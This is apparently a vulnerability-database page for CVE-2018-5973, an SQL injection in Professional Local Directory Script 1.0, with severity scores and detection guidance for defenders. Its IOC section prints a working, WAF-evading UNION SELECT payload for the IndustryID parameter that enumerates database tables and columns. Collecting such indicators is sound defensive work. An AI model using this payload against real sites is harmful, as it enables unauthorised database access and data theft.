CVE-2018-5973
published 2018-01-25CVE-2018-5973: SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or…
PriorityP270critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
20.46%
97.2th percentile
SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eihitech | professional_local_directory_script | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost/[PATH]/sellers_subcategories.php?IndustryID=-105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-↗
command-105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-↗
- →Monitor HTTP GET requests to sellers_subcategories.php with an IndustryID parameter containing SQL injection patterns, particularly MySQL versioned comment syntax (/*!NNNNN...*/), UNION SELECT constructs, and export_set() function calls. ↗
- →Monitor HTTP GET requests to suppliers.php with IndustryID or CategoryID parameters containing SQL injection payloads. ↗
- →Detect MySQL versioned comment obfuscation technique /*!08888 used to bypass WAF/filters in UNION-based SQL injection against these endpoints. ↗
- →The payload targets information_schema.columns to enumerate table and column names via export_set() — alert on references to information_schema in query parameters. ↗
- ·The exploit PoC uses 'localhost' as the target host; in real-world attacks the host will vary. Detection rules should focus on the vulnerable script paths and parameter names (IndustryID, CategoryID) rather than the host. ↗
- ·The [PATH] placeholder in the PoC indicates the application may be installed in an arbitrary subdirectory; path-based detections should use a suffix/contains match on the script filenames rather than an exact path. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2018-01-25
Published